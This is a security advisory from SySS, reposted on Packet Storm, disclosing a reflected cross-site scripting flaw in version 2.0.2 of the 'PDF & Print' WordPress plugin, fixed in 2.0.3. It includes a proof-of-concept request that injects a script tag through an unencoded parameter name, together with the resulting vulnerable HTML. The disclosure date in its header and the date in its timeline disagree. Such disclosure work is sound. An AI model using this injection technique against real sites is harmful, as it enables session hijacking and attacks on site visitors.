exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

WordPress PDF And Print 2.0.2 Cross Site Scripting

WordPress PDF And Print 2.0.2 Cross Site Scripting
Posted Sep 30, 2018
Authored by Robin Trost | Site syss.de

WordPress PDF and Print plugin version 2.0.2 suffers from a cross site scripting vulnerability.

tags | exploit, xss
SHA-256 | fcae867a09c590198715653a584ec1ce21b7b4834e7ee4461aa6b1f6848f7b8c

WordPress PDF And Print 2.0.2 Cross Site Scripting

Change Mirror Download
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Advisory ID: SYSS-2018-014
Product: PDF & Print
Manufacturer: Bestwebsoft
Affected Version: 2.0.2
Tested Version: 2.0.2
Vulnerability Type: Cross-Site-Scripting (CWE-79)
Risk Level: Medium
Solution Status: Fixed
Manufacturer Notification: 2018-08-24
Solution Date: 2018-09-13
Public Disclosure: 2018-09-28
CVE Reference: -
Author of Advisory: Robin Trost, SySS GmbH

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

PDF & Print is a Wordpress Plugin which allows a user to generate a PDF
file from the Blog post or print it.

The manufacturer describes the product as follows (see [1]):

"With this plugin you can create PDF files and print pages quickly.
Add PDF & print buttons to WordPress website pages, posts, and widgets.
Generate documents with custom styles and useful data for archiving,
sharing, or saving."

Due to improper encoding the plugin is vulnerable to reflected
cross-site scripting attacks.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

The called URL gets reflected in the <href> tag for the "View PDF" and
"Print Content" Buttons.
Because the GET-parameter names did not get encoded it is possible to
execute JavaScript trough the URL.

The value of the GET-parameter is encoded correctly, but the name of
the GET-parameter is not encoded which leads to the
Cross-Site-Scripting.

This vulnerability affects all Blog Posts or Wordpress Sites where the
"View PDF" or "Print Content" Button is displayed.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):


GET /index.php/2018/07/25/hello-world/?param1=10"><&10"><script>alert
(10);</script><href=" HTTP/1.1
[...]


That request results in the <script> tag from the URI Path being
embedded in the response in two places so that a browser will execute
the JavaScript code.


[...]
<div class="pdfprnt-buttons pdfprnt-buttons-post pdfprnt-top-right">
<a href="http://<WORDPRESS BASE URL>/index.php/2018/07/25/hello-
world/?param1=10%5C%22%3E%3C&10"><script>alert(10);</script><href="
&print=pdf" class="pdfprnt-button pdfprnt-button-pdf" target=
"_blank">
<img src="http://<WORDPRESS BASE URL>/wp-content/plugins/
pdf-print/images/pdf.png" alt="image_pdf" title="View PDF" />
</a>
<a href="http://<WORDPRESS BASE URL>/index.php/2018/07/25/hello-
world/?param1=10%5C%22%3E%3C&10"><script>alert(10);</script><href="
&print=print" class="pdfprnt-button pdfprnt-button-print" target=
"_blank">
<img src="http://<WORDPRESS BASE URL>/wp-content/plugins/
pdf-print/images/print.png" alt="image_print" title="Print
Content" />
</a>
</div>
[...]


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

Update to version 2.0.3 of PDF & Print

More Information:

https://bestwebsoft.com/products/wordpress/plugins/pdf-print/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2018-07-25: Vulnerability discovered
2018-08-24: Vulnerability reported to manufacturer
2018-09-13: Patch released by manufacturer
2018-10-28: Public disclosure of vulnerability

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Product website for PDF & Print
https://bestwebsoft.com/products/wordpress/plugins/pdf-print/
[2] SySS Security Advisory SYSS-2018-014
https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/
SYSS-2018-014.txt
[3] SySS Responsible Disclosure Policy
https://www.syss.de/en/news/responsible-disclosure-policy/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Robin Trost of SySS
GmbH.

E-Mail: robin.trost at syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/
Robin_Trost.asc
Key ID: 0x698E6EB3
Key Fingerprint: 85FE 80E2 04F3 6177 C61A 4618 61DE F14F 698E 6EB3

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS Web
site.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEhf6A4gTzYXfGGkYYYd7xT2mObrMFAlut4ccACgkQYd7xT2mO
brObOhAAl+WrB0zN0LquBAIPenAln2KyyeyoIVlIqavqfnop/t5RHruZdY1KVAQ6
0kcTLi/177eAE0Wzwi6GZunfLKiYR4yHdSQEKJ3FUCxY/sj9SvgQQFS7+3bKZRsw
ojTG+0J9yklBmVZwBmIoV77Ca9d5qgd44tvfff3OCV1zsIPE91FYb8gNsT7MRHwp
3aw7tFd9xjwpoV/aERXPEURPrGCWC71SS0r5M1aEh5n65gF77HecWZeB2LNodJpI
Q5AHd+8fRtfdagLaBe4ws9qQdB+M7FqUcCPSXnRBsyBSr/4DRa1cl5I/i3AMr81K
m82tmGtflk62YPTQ0EXINw7LLvFOX0sSTK8z/M6vii3O6aBu03Aj1irlixZqDJa5
CTRvXBBXzA35oUJw9Usi+RjG+90PTizOd5HetDWx4k5UEdnYWwNlICN9iIBZHPOo
1b7yqX9E7FIB8elgjphaNpAr2NHyWZS0MeFNi7MAemfWWkrV4st6uHXYJYzvueNH
LnUff8QrE3sVWR+6n7PH+c9IcSU9QvCZg67U0Sg90CSs87eTHLE+IHJ2VmycXTm+
IWPR7EU5PYUMsm8MzcCYNjE4Bxq0Jwx5w8/MXKi0PXvCCrf+zR8Y/bjBaoAy4PUy
s7Z80TFrzQVy4r6xzyWOzJTKe+5ncjWLZYrkAsVGr+W+zhQsGFQ=
=bW9N
-----END PGP SIGNATURE-----
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close